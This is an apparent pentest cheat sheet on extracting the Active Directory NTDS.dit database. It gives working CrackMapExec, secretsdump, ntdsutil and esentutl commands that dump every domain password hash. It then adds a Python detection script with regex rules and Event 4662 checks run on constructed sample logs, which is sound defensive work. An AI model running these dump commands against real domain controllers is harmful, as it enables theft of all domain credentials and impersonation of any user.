NTDS

The NTDS.dit file (NTDS) is the Active Directory database. It stores confidential directory information such as usernames, objects, groups, and password hashes (the hashes are encrypted with a key derived from the boot key held in the domain controller's SYSTEM registry hive, which is why the SYSTEM hive is needed alongside the database). Once the NTDS.dit file has been retrieved, an attacker can effectively impersonate any member of the domain. The file lives only on domain controllers and cannot be read without Domain Administrator-equivalent access, so retrieving it presupposes that full domain compromise has already occurred.

Exploitation

CrackMapExec and Impacket are the easiest ways to remotely dump the NTDS.dit after Domain Administrator credentials have been obtained:

# CrackMapExec (needs a target DC; the flag is --ntds and by default it pulls the
# hashes over DRSUAPI replication, the same mechanism as DCSync)
crackmapexec smb $dcip -u $user -p $password --ntds

# Impacket (-just-dc-ntlm returns only the NTLM hashes and skips Kerberos keys)
impacket-secretsdump -just-dc-ntlm oasis/administrator@$dcip

Alternatively, an attacker can dump the NTDS.dit manually if they have a shell on a Domain Controller:

# Dump the NTDS with ntdsutil (Install From Media export)
# This has worked on older machines where secretsdump and vssadmin failed
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

# Dump the password hashes offline
# The IFM export writes the database to c:\temp\Active Directory\ntds.dit and the
# SYSTEM and SECURITY hives to c:\temp\registry\; without the SYSTEM hive (boot key)
# the hashes in ntds.dit cannot be decrypted
impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

# LOLBIN: copy the live database out of a Volume Shadow Copy (SYSTEM hive still required)
esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\Windows\Tasks\ntds.dit
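Detection side of the techniques above, as an added example that is not part of this cheat sheet. The remote dumps (CrackMapExec, secretsdump) request directory replication over DRSUAPI, which a domain controller logs as Security Event ID 4662 with the DS-Replication-Get-Changes extended rights; the on-host dumps (ntdsutil IFM, esentutl /vss, vssadmin) show up as process-creation events (Sysmon Event ID 1) on the DC. The script below applies both checks to constructed sample records in a simplified dict form; the field names, the DC01/DC02 hosts and the OASIS accounts are assumptions for the example, and real telemetry would first be parsed from EVTX or a SIEM export.

```python
import re

# Well-known Active Directory extended-right GUIDs that a replication request
# (what secretsdump/CrackMapExec use for a remote dump, i.e. DCSync) must hold.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}

# Command-line signatures for the on-host extraction techniques on this page.
PROCESS_RULES = [
    ("ntdsutil IFM export of ntds.dit", re.compile(r"ntdsutil.*\bifm\b", re.I)),
    ("esentutl VSS copy of ntds.dit", re.compile(r"esentutl.*/vss.*ntds\.dit", re.I)),
    ("vssadmin shadow copy created on DC", re.compile(r"vssadmin.*create\s+shadow", re.I)),
]


def check_process_event(event):
    """Sysmon EID 1: return a finding if the command line matches a dump technique."""
    cmd = event.get("CommandLine", "")
    for rule, pattern in PROCESS_RULES:
        if pattern.search(cmd):
            return {"rule": rule, "host": event["Computer"],
                    "subject": event["User"], "evidence": cmd}
    return None


def check_replication_event(event, dc_accounts):
    """Security EID 4662: return a finding if a principal other than a domain
    controller machine account exercised replication rights."""
    granted = {g.lower() for g in event.get("Properties", [])}
    rights = sorted(REPLICATION_RIGHTS[g] for g in granted if g in REPLICATION_RIGHTS)
    if not rights:
        return None
    subject = event["SubjectUserName"]
    if subject in dc_accounts:
        return None  # DC-to-DC replication is expected; only non-DC principals are suspicious
    return {"rule": "replication rights exercised by non-DC principal (DCSync)",
            "host": event["Computer"], "subject": subject, "evidence": ", ".join(rights)}


def scan(events, dc_accounts):
    """Run both checks over a stream of simplified event records."""
    findings = []
    for event in events:
        finding = None
        if event.get("Source") == "Sysmon" and event.get("EventID") == 1:
            finding = check_process_event(event)
        elif event.get("Source") == "Security" and event.get("EventID") == 4662:
            finding = check_replication_event(event, dc_accounts)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry (not real logs): two on-host dumps on DC01, one
# benign process, one legitimate DC-to-DC replication and one DCSync by a user.
DC_ACCOUNTS = {"DC01$", "DC02$"}  # assumed machine accounts of the domain controllers
SAMPLE_EVENTS = [
    {"Source": "Sysmon", "EventID": 1, "Computer": "DC01", "User": "OASIS\\administrator",
     "CommandLine": "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q"},
    {"Source": "Sysmon", "EventID": 1, "Computer": "DC01", "User": "OASIS\\administrator",
     "CommandLine": "esentutl.exe /y /vss c:\\windows\\ntds\\ntds.dit /d c:\\Windows\\Tasks\\ntds.dit"},
    {"Source": "Sysmon", "EventID": 1, "Computer": "DC01", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
    {"Source": "Security", "EventID": 4662, "Computer": "DC01", "SubjectUserName": "DC02$",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"Source": "Security", "EventID": 4662, "Computer": "DC01", "SubjectUserName": "administrator",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"[{f['host']}] {f['rule']} by {f['subject']}: {f['evidence']}")
```

The 4662 check only fires when 4662 auditing is enabled on the domain naming context (it is not on by default) and relies on an allow-list of DC machine accounts, so that list must be kept current as domain controllers are added or demoted; the process-creation rules are substring matches and should be tuned against legitimate backup jobs that also use ntdsutil IFM.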
